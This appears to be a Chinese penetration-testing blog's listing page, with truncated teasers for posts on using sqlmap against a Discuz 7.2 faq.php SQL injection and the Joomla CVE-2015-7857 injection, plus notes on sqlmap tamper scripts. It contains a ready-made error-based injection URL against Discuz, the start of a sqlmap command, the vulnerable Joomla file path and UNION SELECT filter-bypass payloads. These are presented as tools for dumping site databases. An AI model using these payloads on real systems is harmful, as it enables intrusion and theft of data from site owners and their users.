渗透测试

sqlmap利用 Discuz 7.2 faq.php 注入漏洞的方法

老漏洞 不做详细介绍   sqlmap比起网上的脱库工具更灵活 更可靠 更稳定 有效率   exp http://7kb.org/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema .tables group by x)a)%23 sqlmap 构造为 sqlmap.py -u "https://www.7kb.org/faq.php?acti…继续阅读 »
渗透测试

sqlmap利用 Joomla 3.2.0 – 3.4.4 (CVE-2015-7857) 注入漏洞的方法

最近出了一个 Joomla的注入 影响大批网站 随后有人在sebug上给出了exp   漏洞详细说明与利用方法:https://www.trustwave.com/Resources/SpiderLabs-Blog/Joomla-SQL-Injection-Vulnerability-Exploit-Results-in-Full-Administrative-Access/ 存在SQL注入的地方位于:/administrator /components /com_contenthistory/ models/history.php   直接…继续阅读 »
个人笔记

sqlmap tamper的笔记

sqlmap tamper 脚本整理 可一次使用多个脚本,中间用逗号隔开。 album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM 1,2,3,4,5,6, album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f)# 过滤逗号 apostrophemask.py 用utf8代替引号 Example: ("1 AND '1'='1") '1 …继续阅读 »